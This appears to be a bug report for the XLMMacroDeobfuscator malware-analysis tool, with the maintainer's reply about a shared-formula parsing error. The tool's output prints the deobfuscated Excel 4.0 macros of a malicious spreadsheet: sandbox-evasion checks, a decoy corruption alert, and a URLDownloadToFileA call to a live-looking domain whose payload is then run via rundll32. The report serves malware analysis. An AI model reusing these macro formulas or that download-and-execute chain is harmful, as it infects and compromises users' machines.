Error [deobfuscator.py:2433....

[JA1E0]

When analyzing a malicious document with version 0.1.4, analysis proceeds until...

XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin

Unencrypted xls file

[Loading Cells]
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
auto_open: auto_open->'CSHykdYHvi'!$J$727
[Starting Deobfuscation]
CELL:J727 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5)
CELL:J728 , PartialEvaluation , =WAIT("2021-02-20 14:47:40.575765")
CELL:J729 , FullEvaluation , FOPEN("c:\users\public\1.reg",1)
CELL:J730 , PartialEvaluation , =FPOS(FOPEN("c:\users\public\1.reg",1),215)
CELL:J732 , PartialEvaluation , =FCLOSE(FOPEN("c:\users\public\1.reg",1))
CELL:J733 , PartialEvaluation , =FILE.DELETE("c:\users\public\1.reg")
CELL:J734 , Branching , IF(ISNUMBER(SEARCH("0001",J731)),CLOSE(FALSE),GOTO(J1))
CELL:J734 , FullEvaluation , [FALSE] GOTO(J1)
CELL:J1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",K2)
CELL:J2 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",K4)
CELL:J4 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5)
CELL:J5 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(42),,CLOSE(TRUE))",K6)
CELL:J6 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7)
CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
CELL:J8 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9)
CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
CELL:J11 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12)
CELL:J12 , PartialEvaluation , =WORKBOOK.HIDE("CSHykdYHvi",TRUE)
CELL:J13 , FullEvaluation , GOTO(K2)
CELL:K2 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:K4 , FullEvaluation , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
Error [deobfuscator.py:2433 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('NAME', 'FMLA') at line 1, column 9.
Expected one of:
* $END
* CONCATOP
* ADDITIVEOP
* L_PRA
* CMPOP
* MULTIOP
* EXCLAMATION
Previous tokens: [Token('NAME', 'SHARED')]

Files:

[END of Deobfuscation]
time elapsed: 0.1893155574798584

sample MD5: b5d469a07709b5ca6fee934b1e5e8e38

[DissectMalware]

Seems a problem in xlrd2 parser (xls). It doesn't support parsing shared formula. Will test soon.

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/984826cc-8bb7-412b-9907-7bbb9b08b4ad